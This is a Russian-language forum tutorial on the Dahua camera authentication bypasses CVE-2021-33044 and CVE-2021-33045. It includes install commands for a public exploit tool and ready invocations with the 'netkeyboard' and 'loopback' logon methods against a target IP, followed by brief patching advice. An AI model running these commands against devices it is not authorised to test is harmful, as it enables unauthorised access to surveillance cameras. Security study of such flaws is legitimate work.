Приветствую Уважаемых Форумчан и Друзей.
Сегодня поговорим немного об уязвимости в конфигурации устройств Dahua.
CVE-2021-33044 и CVE-2021-33045 были обнаружены ещё летом 2021 года.
Но по каким-то причинам, более подробно о них стало известно ближе к сентябрю.
На данный момент им присвоена высокая степень опасности.
Затрагивают уязвимости видеокамеры компании Dahua.
Эксплуатируются несколькими методами обхода аутентификации.
После чего легко получить доступ к консоли и выполнять множество команд.
Информация предоставлена исключительно в рамках ознакомления и изучения проблем безопасности.
Запрещено её использование в незаконных целях.
В своём примере для изучения пользовался скриптом от mcw0,написанном на python:
Код:
# git clone https://github.com/mcw0/DahuaConsole.git
# cd DahuaConsole/
# pip3 install -r requirements.txt
Примеры запуска скрипта для CVE-2021-33044
Код:
# ./Console.py --logon netkeyboard --rhost IP_цели --proto dhip --rport 80
# ./Console.py --logon netkeyboard --rhost IP_цели --proto http --rport 80
# ./Console.py --logon netkeyboard --rhost IP_цели --proto https --rport 80
Пример запуска скрипта для CVE-2021-33045
Код:
# ./Console.py --logon loopback --rhost IP_цели --proto dhip --rport 80
Ссылка скрыта от гостей
Сам скрипт имеет меню help с опциями
Устройств с уязвимой конфигурацией, к сожалению, много.
Рассмотрим тестируемую цель.
Скрипт сразу покажет, если цель уязвима.
Здесь можно видеть, что мы в консоли и права уже повышены.
Можно также посмотреть доступные команды
Далее, можно извлекать различную информацию, создавать клиента и т.д.
Здесь вывел список доступных сервисов
Действительно много чего доступно
Защита
Разработчики пока решили пойти кратчайшим стандартным путём.
И предлагают обновиться пользователям до новых версий ПО, либо сразу установить последние версии.
Всё это предлагается
Ссылка скрыта от гостей
И всё-таки что-то подсказывает, мы ещё услышим об атаках на подобные девайсы.
Всем мира, добра и до новых встреч.
Последнее редактирование модератором: